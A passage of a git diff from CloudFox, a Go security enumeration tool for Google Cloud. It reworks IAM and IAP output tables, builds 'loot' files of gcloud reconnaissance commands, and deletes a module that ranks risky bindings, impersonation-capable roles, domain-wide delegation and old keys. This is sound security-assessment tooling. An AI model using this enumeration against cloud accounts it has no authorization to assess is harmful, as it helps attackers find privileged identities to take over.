+619,12 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { // Build tables tables := []internal.TableFile{ { - Name: "iam-principals", - Header: principalHeader, - Body: principalBody, + Name: "iam", + Header: header, + Body: body, }, } - // Add service accounts table if there are any - if len(saBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "iam-service-accounts", - Header: saHeader, - Body: saBody, - }) - } - - // Add custom roles table if there are any - if len(customRoleBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "iam-custom-roles", - Header: customRoleHeader, - Body: customRoleBody, - }) - } - - // Add groups table if there are any - if len(groupBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "iam-groups", - Header: groupHeader, - Body: groupBody, - }) - } - - // Add high privilege principals table if there are any - if len(highPrivBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "iam-high-privilege", - Header: highPrivHeader, - Body: highPrivBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d principal(s) with high-privilege roles!", len(highPrivBody)), globals.GCP_IAM_MODULE_NAME) - } - - // Conditional bindings table - conditionsHeader := []string{ - "Principal", - "Type", - "Role", - "Condition Title", - "Condition Expression", - "Project Name", - "Project", - } - - var conditionsBody [][]string - for _, principal := range m.Principals { - for _, binding := range principal.PolicyBindings { - if binding.HasCondition && binding.ConditionInfo != nil { - conditionsBody = append(conditionsBody, []string{ - principal.Email, - principal.Type, - binding.Role, - binding.ConditionInfo.Title, - truncateString(binding.ConditionInfo.Expression, 80), - m.GetProjectName(binding.ResourceID), - binding.ResourceID, - }) - } - } - } - - // Add conditional bindings table if there are any - if len(conditionsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "iam-conditions", - Header: conditionsHeader, - Body: conditionsBody, - }) - } - // Log warnings for security findings if publicAccessFound { logger.InfoM("[FINDING] Public access (allUsers/allAuthenticatedUsers) detected in IAM bindings!", globals.GCP_IAM_MODULE_NAME) @@ -708,8 +632,8 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { if saWithKeys > 0 { logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys!", saWithKeys), globals.GCP_IAM_MODULE_NAME) } - if conditionsFound { - logger.InfoM(fmt.Sprintf("[INFO] Found %d conditional IAM binding(s)", len(conditionsBody)), globals.GCP_IAM_MODULE_NAME) + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege role binding(s)!", highPrivCount), globals.GCP_IAM_MODULE_NAME) } output := IAMOutput{ @@ -717,20 +641,40 @@ func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { Loot: lootFiles, } - // Write output using HandleOutputSmart with scope support - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + // Use organization scope with [O] prefix format + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + // Fall back to project scope + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } } + err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + scopeType, + scopeIdentifiers, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go index 042e5393..2d33a1fe 100644 --- a/gcp/commands/iap.go +++ b/gcp/commands/iap.go @@ -94,79 +94,90 @@ func (m *IAPModule) processProject(ctx context.Context, projectID string, logger } func (m *IAPModule) initializeLootFiles() { - m.LootMap["iap-tunnel-groups"] = &internal.LootFile{ - Name: "iap-tunnel-groups", - Contents: "# IAP Tunnel Destination Groups\n# Generated by CloudFox\n\n", - } - m.LootMap["iap-tunnel-cidrs"] = &internal.LootFile{ - Name: "iap-tunnel-cidrs", - Contents: "", + m.LootMap["iap-commands"] = &internal.LootFile{ + Name: "iap-commands", + Contents: "# IAP Commands\n# Generated by CloudFox\n\n", } } func (m *IAPModule) addToLoot(group iapservice.TunnelDestGroup) { - m.LootMap["iap-tunnel-groups"].Contents += fmt.Sprintf( - "# Group: %s\n# Region: %s\n# CIDRs: %s\n# FQDNs: %s\n\n", - group.Name, group.Region, + m.LootMap["iap-commands"].Contents += fmt.Sprintf( + "## Tunnel Destination Group: %s (Project: %s, Region: %s)\n"+ + "# CIDRs: %s\n"+ + "# FQDNs: %s\n\n"+ + "# Describe tunnel destination group:\n"+ + "gcloud iap tcp dest-groups describe %s --region=%s --project=%s\n\n"+ + "# List IAM policy for tunnel destination group:\n"+ + "gcloud iap tcp dest-groups get-iam-policy %s --region=%s --project=%s\n\n", + group.Name, group.ProjectID, group.Region, strings.Join(group.CIDRs, ", "), - strings.Join(group.FQDNs, ", ")) - - for _, cidr := range group.CIDRs { - m.LootMap["iap-tunnel-cidrs"].Contents += fmt.Sprintf("%s # %s\n", cidr, group.Name) - } + strings.Join(group.FQDNs, ", "), + group.Name, group.Region, group.ProjectID, + group.Name, group.Region, group.ProjectID, + ) } func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { var tables []internal.TableFile - // Tunnel Destination Groups table - header := []string{"Name", "Region", "CIDRs", "FQDNs", "Risk", "Project Name", "Project"} + // Tunnel Destination Groups table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "CIDRs", + "FQDNs", + "IAM Role", + "IAM Member", + } + var body [][]string for _, group := range m.TunnelDestGroups { + // No truncation - show full content cidrs := strings.Join(group.CIDRs, ", ") - if len(cidrs) > 40 { - cidrs = cidrs[:37] + "..." + if cidrs == "" { + cidrs = "-" } fqdns := strings.Join(group.FQDNs, ", ") - if len(fqdns) > 40 { - fqdns = fqdns[:37] + "..." + if fqdns == "" { + fqdns = "-" } - body = append(body, []string{ - group.Name, - group.Region, - cidrs, - fqdns, - group.RiskLevel, - m.GetProjectName(group.ProjectID), - group.ProjectID, - }) - } - tables = append(tables, internal.TableFile{ - Name: "iap-tunnel-groups", - Header: header, - Body: body, - }) - - // High-risk findings - var highRiskBody [][]string - for _, group := range m.TunnelDestGroups { - if group.RiskLevel == "HIGH" || group.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - group.Name, - group.RiskLevel, - strings.Join(group.RiskReasons, "; "), + // If group has IAM bindings, create one row per binding + if len(group.IAMBindings) > 0 { + for _, binding := range group.IAMBindings { + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.ProjectID, + group.Name, + group.Region, + cidrs, + fqdns, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + body = append(body, []string{ m.GetProjectName(group.ProjectID), group.ProjectID, + group.Name, + group.Region, + cidrs, + fqdns, + "-", + "-", }) } } - if len(highRiskBody) > 0 { + if len(body) > 0 { tables = append(tables, internal.TableFile{ - Name: "iap-risks", - Header: []string{"Group", "Risk Level", "Reasons", "Project Name", "Project"}, - Body: highRiskBody, + Name: "iap-tunnel-groups", + Header: header, + Body: body, }) } diff --git a/gcp/commands/identityprotection.go b/gcp/commands/identityprotection.go deleted file mode 100644 index cbfb1159..00000000 --- a/gcp/commands/identityprotection.go +++ /dev/null @@ -1,936 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "sort" - "strings" - "sync" - "time" - - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" - - "google.golang.org/api/cloudresourcemanager/v1" - "google.golang.org/api/iam/v1" -) - -// Module name constant -const GCP_IDENTITYPROTECTION_MODULE_NAME string = "identity-protection" - -var GCPIdentityProtectionCommand = &cobra.Command{ - Use: GCP_IDENTITYPROTECTION_MODULE_NAME, - Aliases: []string{"identity", "risky-identities", "iam-risk"}, - Short: "Risk-based identity analysis and suspicious activity detection", - Long: `Analyze IAM identities for security risks, unused permissions, and policy recommendations. - -Features: -- Identifies risky IAM bindings (overly permissive roles) -- Detects unused permissions and over-provisioned identities -- Analyzes service account key age and rotation status -- Identifies external identities with access -- Detects domain-wide delegation configurations -- Provides policy recommendations for least privilege -- Maps identity attack surface - -Risk Categories: -- CRITICAL: Owner/Editor roles, domain-wide delegation, allUsers access -- HIGH: Primitive roles, external identity access, old service account keys -- MEDIUM: Broad permissions, unused high-privilege roles -- LOW: Minor policy improvements recommended - -Requires appropriate IAM permissions: -- roles/iam.securityReviewer -- roles/resourcemanager.organizationViewer`, - Run: runGCPIdentityProtectionCommand, -} - -// ------------------------------ -// Data Structures -// ------------------------------ - -type RiskyBinding struct { - Principal string - Role string - Resource string - ResourceType string - ProjectID string - RiskLevel string - RiskReason string - Recommendation string - BindingType string // user, serviceAccount, group, domain, allUsers, allAuthenticatedUsers -} - -type UnusedPermission struct { - Principal string - Role string - Resource string - ProjectID string - LastUsed string - DaysSinceUse int - Recommendation string - PermissionCount int -} - -type ServiceAccountRisk struct { - Email string - ProjectID string - DisplayName string - KeyCount int - OldestKeyAge int // days - HasUserManagedKey bool - DomainWideDelegation bool - RiskLevel string - RiskReasons []string - Recommendations []string -} - -type ExternalIdentity struct { - Principal string - IdentityType string // external-user, external-sa, external-domain - Domain string - Roles []string - Resources []string - ProjectID string - RiskLevel string - Details string -} - -type IdentityRisk struct { - RiskType string - Severity string - AffectedCount int - Description string - Mitigation string -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type IdentityProtectionModule struct { - gcpinternal.BaseGCPModule - - // Module-specific fields - RiskyBindings []RiskyBinding - UnusedPermissions []UnusedPermission - ServiceAccountRisks []ServiceAccountRisk - ExternalIdentities []ExternalIdentity - IdentityRisks []IdentityRisk - LootMap map[string]*internal.LootFile - mu sync.Mutex - - // Tracking - projectDomains map[string]string // project -> org domain - allUsersCount int - allAuthCount int - ownerCount int - editorCount int - externalCount int -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type IdentityProtectionOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o IdentityProtectionOutput) TableFiles() []internal.TableFile { return o.Table } -func (o IdentityProtectionOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPIdentityProtectionCommand(cmd *cobra.Command, args []string) { - // Initialize command context - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_IDENTITYPROTECTION_MODULE_NAME) - if err != nil { - return - } - - // Create module instance - module := &IdentityProtectionModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - RiskyBindings: []RiskyBinding{}, - UnusedPermissions: []UnusedPermission{}, - ServiceAccountRisks: []ServiceAccountRisk{}, - ExternalIdentities: []ExternalIdentity{}, - IdentityRisks: []IdentityRisk{}, - LootMap: make(map[string]*internal.LootFile), - projectDomains: make(map[string]string), - } - - // Initialize loot files - module.initializeLootFiles() - - // Execute enumeration - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *IdentityProtectionModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Analyzing identity risks and policy recommendations...", GCP_IDENTITYPROTECTION_MODULE_NAME) - - // Create service clients - crmService, err := cloudresourcemanager.NewService(ctx) - if err != nil { - logger.ErrorM(fmt.Sprintf("Failed to create Resource Manager service: %v", err), GCP_IDENTITYPROTECTION_MODULE_NAME) - return - } - - iamService, err := iam.NewService(ctx) - if err != nil { - logger.ErrorM(fmt.Sprintf("Failed to create IAM service: %v", err), GCP_IDENTITYPROTECTION_MODULE_NAME) - return - } - - // Process each project - var wg sync.WaitGroup - for _, projectID := range m.ProjectIDs { - wg.Add(1) - go func(project string) { - defer wg.Done() - m.processProject(ctx, project, crmService, iamService, logger) - }(projectID) - } - wg.Wait() - - // Analyze and summarize risks - m.summarizeRisks(logger) - - // Check results - totalRisks := len(m.RiskyBindings) + len(m.ServiceAccountRisks) + len(m.ExternalIdentities) - if totalRisks == 0 { - logger.InfoM("No identity risks found", GCP_IDENTITYPROTECTION_MODULE_NAME) - return - } - - logger.SuccessM(fmt.Sprintf("Found %d risky binding(s), %d service account risk(s), %d external identity(ies)", - len(m.RiskyBindings), len(m.ServiceAccountRisks), len(m.ExternalIdentities)), GCP_IDENTITYPROTECTION_MODULE_NAME) - - if m.allUsersCount > 0 || m.allAuthCount > 0 { - logger.InfoM(fmt.Sprintf("[CRITICAL] Found %d allUsers and %d allAuthenticatedUsers bindings!", - m.allUsersCount, m.allAuthCount), GCP_IDENTITYPROTECTION_MODULE_NAME) - } - - if m.ownerCount > 0 || m.editorCount > 0 { - logger.InfoM(fmt.Sprintf("[HIGH] Found %d Owner and %d Editor role bindings", - m.ownerCount, m.editorCount), GCP_IDENTITYPROTECTION_MODULE_NAME) - } - - // Write output - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *IdentityProtectionModule) processProject(ctx context.Context, projectID string, crmService *cloudresourcemanager.Service, iamService *iam.Service, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Analyzing identities for project: %s", projectID), GCP_IDENTITYPROTECTION_MODULE_NAME) - } - - // Analyze IAM policy bindings - m.analyzeIAMPolicy(ctx, projectID, crmService, logger) - - // Analyze service accounts - m.analyzeServiceAccounts(ctx, projectID, iamService, logger) -} - -func (m *IdentityProtectionModule) analyzeIAMPolicy(ctx context.Context, projectID string, crmService *cloudresourcemanager.Service, logger internal.Logger) { - // Get IAM policy for the project - policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_IDENTITYPROTECTION_MODULE_NAME, - fmt.Sprintf("Could not get IAM policy for project %s", projectID)) - return - } - - for _, binding := range policy.Bindings { - for _, member := range binding.Members { - m.analyzeBinding(member, binding.Role, projectID, "project", logger) - } - } -} - -func (m *IdentityProtectionModule) analyzeBinding(member, role, projectID, resourceType string, logger internal.Logger) { - riskLevel := "LOW" - riskReason := "" - recommendation := "" - bindingType := m.getBindingType(member) - - // Check for allUsers/allAuthenticatedUsers (CRITICAL) - if member == "allUsers" { - riskLevel = "CRITICAL" - riskReason = "Public access: allUsers grants access to anyone on the internet" - recommendation = "Remove allUsers binding immediately unless intentionally public" - m.mu.Lock() - m.allUsersCount++ - m.mu.Unlock() - } else if member == "allAuthenticatedUsers" { - riskLevel = "CRITICAL" - riskReason = "Any Google account: allAuthenticatedUsers grants access to any authenticated Google user" - recommendation = "Replace with specific users/groups or use IAM Conditions" - m.mu.Lock() - m.allAuthCount++ - m.mu.Unlock() - } - - // Check for Owner/Editor roles (HIGH) - if strings.Contains(role, "roles/owner") { - if riskLevel != "CRITICAL" { - riskLevel = "HIGH" - } - riskReason = "Owner role: Full administrative access including IAM management" - recommendation = "Replace with specific roles following least privilege principle" - m.mu.Lock() - m.ownerCount++ - m.mu.Unlock() - } else if strings.Contains(role, "roles/editor") { - if riskLevel != "CRITICAL" { - riskLevel = "HIGH" - } - riskReason = "Editor role: Broad modify access to most resources" - recommendation = "Replace with specific roles for required services only" - m.mu.Lock() - m.editorCount++ - m.mu.Unlock() - } - - // Check for other high-risk roles - highRiskRoles := map[string]string{ - "roles/iam.securityAdmin": "Can manage all IAM policies", - "roles/iam.serviceAccountAdmin": "Can create/delete service accounts", - "roles/iam.serviceAccountKeyAdmin": "Can create service account keys", - "roles/iam.serviceAccountTokenCreator": "Can impersonate service accounts", - "roles/resourcemanager.projectIamAdmin": "Can manage project IAM policies", - "roles/cloudfunctions.admin": "Can deploy functions with any SA", - "roles/compute.admin": "Full compute access including SSH", - "roles/storage.admin": "Full storage access", - } - - if reason, isHighRisk := highRiskRoles[role]; isHighRisk { - if riskLevel == "LOW" { - riskLevel = "MEDIUM" - riskReason = reason - recommendation = "Review if this level of access is necessary" - } - } - - // Check for external identities - if m.isExternalIdentity(member, projectID) { - if riskLevel == "LOW" { - riskLevel = "MEDIUM" - } - riskReason += "; External identity with access" - m.mu.Lock() - m.externalCount++ - - // Track external identity - domain := m.extractDomain(member) - external := ExternalIdentity{ - Principal: member, - IdentityType: bindingType, - Domain: domain, - Roles: []string{role}, - Resources: []string{projectID}, - ProjectID: projectID, - RiskLevel: riskLevel, - Details: fmt.Sprintf("External %s with %s role", bindingType, role), - } - m.ExternalIdentities = append(m.ExternalIdentities, external) - m.mu.Unlock() - } - - // Only track if there's a risk - if riskLevel != "LOW" || m.isHighPrivilegeRole(role) { - risky := RiskyBinding{ - Principal: member, - Role: role, - Resource: projectID, - ResourceType: resourceType, - ProjectID: projectID, - RiskLevel: riskLevel, - RiskReason: riskReason, - Recommendation: recommendation, - BindingType: bindingType, - } - - m.mu.Lock() - m.RiskyBindings = append(m.RiskyBindings, risky) - m.addRiskyBindingToLoot(risky) - m.mu.Unlock() - } -} - -func (m *IdentityProtectionModule) analyzeServiceAccounts(ctx context.Context, projectID string, iamService *iam.Service, logger internal.Logger) { - // List service accounts - saList, err := iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID)).Do() - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_IDENTITYPROTECTION_MODULE_NAME, - fmt.Sprintf("Could not list service accounts for project %s", projectID)) - return - } - - for _, sa := range saList.Accounts { - saRisk := ServiceAccountRisk{ - Email: sa.Email, - ProjectID: projectID, - DisplayName: sa.DisplayName, - RiskLevel: "LOW", - RiskReasons: []string{}, - Recommendations: []string{}, - } - - // Check for domain-wide delegation - if sa.Oauth2ClientId != "" { - // Service account has OAuth client ID, may have domain-wide delegation - saRisk.DomainWideDelegation = true - saRisk.RiskLevel = "CRITICAL" - saRisk.RiskReasons = append(saRisk.RiskReasons, "Domain-wide delegation enabled - can impersonate any user in the domain") - saRisk.Recommendations = append(saRisk.Recommendations, "Review and restrict domain-wide delegation scopes") - } - - // List service account keys - keysResp, err := iamService.Projects.ServiceAccounts.Keys.List(fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email)).Do() - if err == nil { - userManagedKeys := 0 - var oldestKeyAge int - - for _, key := range keysResp.Keys { - if key.KeyType == "USER_MANAGED" { - userManagedKeys++ - saRisk.HasUserManagedKey = true - - // Check key age - validAfter, err := time.Parse(time.RFC3339, key.ValidAfterTime) - if err == nil { - keyAge := int(time.Since(validAfter).Hours() / 24) - if keyAge > oldestKeyAge { - oldestKeyAge = keyAge - } - } - } - } - - saRisk.KeyCount = userManagedKeys - saRisk.OldestKeyAge = oldestKeyAge - - if userManagedKeys > 0 { - if saRisk.RiskLevel == "LOW" { - saRisk.RiskLevel = "MEDIUM" - } - saRisk.RiskReasons = append(saRisk.RiskReasons, fmt.Sprintf("%d user-managed key(s) exist", userManagedKeys)) - saRisk.Recommendations = append(saRisk.Recommendations, "Use workload identity or short-lived tokens instead of keys") - } - - if oldestKeyAge > 90 { - if saRisk.RiskLevel == "LOW" || saRisk.RiskLevel == "MEDIUM" { - saRisk.RiskLevel = "HIGH" - } - saRisk.RiskReasons = append(saRisk.RiskReasons, fmt.Sprintf("Oldest key is %d days old (>90 days)", oldestKeyAge)) - saRisk.Recommendations = append(saRisk.Recommendations, "Rotate service account keys - keys should be rotated every 90 days") - } - } - - // Check for default compute service account - if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { - saRisk.RiskReasons = append(saRisk.RiskReasons, "Default Compute Engine service account - often over-privileged") - saRisk.Recommendations = append(saRisk.Recommendations, "Create custom service accounts with minimal permissions") - } - - // Check for App Engine default service account - if strings.Contains(sa.Email, "@appspot.gserviceaccount.com") { - saRisk.RiskReasons = append(saRisk.RiskReasons, "App Engine default service account") - saRisk.Recommendations = append(saRisk.Recommendations, "Review App Engine service account permissions") - } - - // Only add if there are risks - if len(saRisk.RiskReasons) > 0 { - m.mu.Lock() - m.ServiceAccountRisks = append(m.ServiceAccountRisks, saRisk) - m.addServiceAccountRiskToLoot(saRisk) - m.mu.Unlock() - } - } -} - -// ------------------------------ -// Risk Analysis -// ------------------------------ -func (m *IdentityProtectionModule) summarizeRisks(logger internal.Logger) { - m.mu.Lock() - defer m.mu.Unlock() - - // Summarize allUsers/allAuthenticatedUsers - if m.allUsersCount > 0 { - m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ - RiskType: "public-access", - Severity: "CRITICAL", - AffectedCount: m.allUsersCount, - Description: "Resources accessible to anyone on the internet", - Mitigation: "Remove allUsers bindings unless resource is intentionally public", - }) - } - - if m.allAuthCount > 0 { - m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ - RiskType: "all-authenticated-users", - Severity: "CRITICAL", - AffectedCount: m.allAuthCount, - Description: "Resources accessible to any Google account holder", - Mitigation: "Replace with specific users/groups or domain restrictions", - }) - } - - // Summarize Owner/Editor roles - if m.ownerCount > 0 { - m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ - RiskType: "owner-role", - Severity: "HIGH", - AffectedCount: m.ownerCount, - Description: "Owner role grants full administrative access", - Mitigation: "Use specific admin roles instead of Owner", - }) - } - - if m.editorCount > 0 { - m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ - RiskType: "editor-role", - Severity: "HIGH", - AffectedCount: m.editorCount, - Description: "Editor role grants broad modify access", - Mitigation: "Replace with service-specific roles", - }) - } - - // Summarize external access - if m.externalCount > 0 { - m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ - RiskType: "external-access", - Severity: "MEDIUM", - AffectedCount: m.externalCount, - Description: "External identities have access to resources", - Mitigation: "Review and document external access requirements", - }) - } - - // Count domain-wide delegation - dwdCount := 0 - for _, sa := range m.ServiceAccountRisks { - if sa.DomainWideDelegation { - dwdCount++ - } - } - if dwdCount > 0 { - m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ - RiskType: "domain-wide-delegation", - Severity: "CRITICAL", - AffectedCount: dwdCount, - Description: "Service accounts with domain-wide delegation can impersonate any domain user", - Mitigation: "Restrict delegation scopes to minimum required", - }) - } - - // Count old keys - oldKeyCount := 0 - for _, sa := range m.ServiceAccountRisks { - if sa.OldestKeyAge > 90 { - oldKeyCount++ - } - } - if oldKeyCount > 0 { - m.IdentityRisks = append(m.IdentityRisks, IdentityRisk{ - RiskType: "old-service-account-keys", - Severity: "HIGH", - AffectedCount: oldKeyCount, - Description: "Service account keys older than 90 days", - Mitigation: "Implement key rotation policy or use workload identity", - }) - } -} - -// ------------------------------ -// Helper Functions -// ------------------------------ -func (m *IdentityProtectionModule) getBindingType(member string) string { - switch { - case member == "allUsers": - return "allUsers" - case member == "allAuthenticatedUsers": - return "allAuthenticatedUsers" - case strings.HasPrefix(member, "user:"): - return "user" - case strings.HasPrefix(member, "serviceAccount:"): - return "serviceAccount" - case strings.HasPrefix(member, "group:"): - return "group" - case strings.HasPrefix(member, "domain:"): - return "domain" - default: - return "unknown" - } -} - -func (m *IdentityProtectionModule) isExternalIdentity(member, projectID string) bool { - // Extract domain from member - domain := m.extractDomain(member) - if domain == "" { - return false - } - - // Check if it's a GCP service account in same project - if strings.HasSuffix(domain, ".iam.gserviceaccount.com") { - // Extract project from SA email - parts := strings.Split(domain, ".") - if len(parts) > 0 { - saProject := parts[0] - if saProject == projectID { - return false - } - } - return true // External service account - } - - // Check against known internal domains (would need org domain) - // For now, consider external if not a GCP service account - return !strings.Contains(domain, "gserviceaccount.com") -} - -func (m *IdentityProtectionModule) extractDomain(member string) string { - // Remove prefix - parts := strings.SplitN(member, ":", 2) - if len(parts) != 2 { - return "" - } - - email := parts[1] - emailParts := strings.Split(email, "@") - if len(emailParts) != 2 { - return "" - } - - return emailParts[1] -} - -func (m *IdentityProtectionModule) isHighPrivilegeRole(role string) bool { - highPrivRoles := []string{ - "roles/owner", - "roles/editor", - "roles/iam.securityAdmin", - "roles/iam.serviceAccountAdmin", - "roles/iam.serviceAccountKeyAdmin", - "roles/iam.serviceAccountTokenCreator", - "roles/resourcemanager.projectIamAdmin", - "roles/resourcemanager.organizationAdmin", - "roles/compute.admin", - "roles/storage.admin", - "roles/bigquery.admin", - "roles/cloudsql.admin", - "roles/cloudfunctions.admin", - "roles/run.admin", - "roles/container.admin", - } - - for _, r := range highPrivRoles { - if role == r { - return true - } - } - return false -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *IdentityProtectionModule) initializeLootFiles() { - m.LootMap["risky-accounts"] = &internal.LootFile{ - Name: "risky-accounts", - Contents: "# Risky IAM Bindings\n# Generated by CloudFox\n# Review and remediate these bindings!\n\n", - } - m.LootMap["unused-permissions"] = &internal.LootFile{ - Name: "unused-permissions", - Contents: "# Unused/Over-provisioned Permissions\n# Generated by CloudFox\n\n", - } - m.LootMap["remediation-commands"] = &internal.LootFile{ - Name: "remediation-commands", - Contents: "# IAM Remediation Commands\n# Generated by CloudFox\n# Review before executing!\n\n", - } - m.LootMap["external-access"] = &internal.LootFile{ - Name: "external-access", - Contents: "# External Identity Access\n# Generated by CloudFox\n\n", - } - m.LootMap["service-account-risks"] = &internal.LootFile{ - Name: "service-account-risks", - Contents: "# Service Account Security Risks\n# Generated by CloudFox\n\n", - } -} - -func (m *IdentityProtectionModule) addRiskyBindingToLoot(binding RiskyBinding) { - m.LootMap["risky-accounts"].Contents += fmt.Sprintf( - "## %s [%s]\n"+ - "Role: %s\n"+ - "Resource: %s\n"+ - "Risk: %s\n"+ - "Recommendation: %s\n\n", - binding.Principal, - binding.RiskLevel, - binding.Role, - binding.Resource, - binding.RiskReason, - binding.Recommendation, - ) - - // Add remediation command - if binding.RiskLevel == "CRITICAL" || binding.RiskLevel == "HIGH" { - m.LootMap["remediation-commands"].Contents += fmt.Sprintf( - "# Remove %s binding for %s\n"+ - "gcloud projects remove-iam-policy-binding %s \\\n"+ - " --member=\"%s\" \\\n"+ - " --role=\"%s\"\n\n", - binding.RiskLevel, binding.Principal, - binding.ProjectID, - binding.Principal, - binding.Role, - ) - } - - // Track external access - if binding.BindingType == "user" || binding.BindingType == "serviceAccount" { - domain := m.extractDomain(binding.Principal) - if domain != "" && !strings.Contains(domain, "gserviceaccount.com") { - m.LootMap["external-access"].Contents += fmt.Sprintf( - "%s (%s) - %s on %s\n", - binding.Principal, domain, binding.Role, binding.Resource, - ) - } - } -} - -func (m *IdentityProtectionModule) addServiceAccountRiskToLoot(saRisk ServiceAccountRisk) { - m.LootMap["service-account-risks"].Contents += fmt.Sprintf( - "## %s [%s]\n"+ - "Project: %s\n"+ - "Display Name: %s\n"+ - "User-Managed Keys: %d\n"+ - "Oldest Key Age: %d days\n"+ - "Domain-Wide Delegation: %t\n"+ - "Risks:\n", - saRisk.Email, - saRisk.RiskLevel, - saRisk.ProjectID, - saRisk.DisplayName, - saRisk.KeyCount, - saRisk.OldestKeyAge, - saRisk.DomainWideDelegation, - ) - - for _, reason := range saRisk.RiskReasons { - m.LootMap["service-account-risks"].Contents += fmt.Sprintf(" - %s\n", reason) - } - - m.LootMap["service-account-risks"].Contents += "Recommendations:\n" - for _, rec := range saRisk.Recommendations { - m.LootMap["service-account-risks"].Contents += fmt.Sprintf(" - %s\n", rec) - } - m.LootMap["service-account-risks"].Contents += "\n" - - // Add key rotation commands - if saRisk.OldestKeyAge > 90 { - m.LootMap["remediation-commands"].Contents += fmt.Sprintf( - "# Rotate keys for %s (oldest key: %d days)\n"+ - "# List keys:\n"+ - "gcloud iam service-accounts keys list --iam-account=%s\n"+ - "# Delete old key:\n"+ - "# gcloud iam service-accounts keys delete KEY_ID --iam-account=%s\n\n", - saRisk.Email, saRisk.OldestKeyAge, - saRisk.Email, - saRisk.Email, - ) - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *IdentityProtectionModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort risky bindings by risk level - sort.Slice(m.RiskyBindings, func(i, j int) bool { - riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} - return riskOrder[m.RiskyBindings[i].RiskLevel] < riskOrder[m.RiskyBindings[j].RiskLevel] - }) - - // Risky Bindings table - bindingsHeader := []string{ - "Principal", - "Role", - "Resource", - "Risk Level", - "Type", - "Risk Reason", - } - - var bindingsBody [][]string - for _, b := range m.RiskyBindings { - bindingsBody = append(bindingsBody, []string{ - truncateString(b.Principal, 40), - truncateString(b.Role, 35), - b.Resource, - b.RiskLevel, - b.BindingType, - truncateString(b.RiskReason, 40), - }) - } - - // Service Account Risks table - saRisksHeader := []string{ - "Service Account", - "Project Name", - "Project ID", - "Risk Level", - "Keys", - "Key Age", - "DWD", - "Risks", - } - - var saRisksBody [][]string - for _, sa := range m.ServiceAccountRisks { - dwd := "No" - if sa.DomainWideDelegation { - dwd = "Yes" - } - - saRisksBody = append(saRisksBody, []string{ - truncateString(sa.Email, 40), - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.RiskLevel, - fmt.Sprintf("%d", sa.KeyCount), - fmt.Sprintf("%d days", sa.OldestKeyAge), - dwd, - truncateString(strings.Join(sa.RiskReasons, "; "), 40), - }) - } - - // External Identities table - externalHeader := []string{ - "Identity", - "Type", - "Domain", - "Project Name", - "Project ID", - "Risk Level", - "Details", - } - - var externalBody [][]string - for _, e := range m.ExternalIdentities { - externalBody = append(externalBody, []string{ - truncateString(e.Principal, 40), - 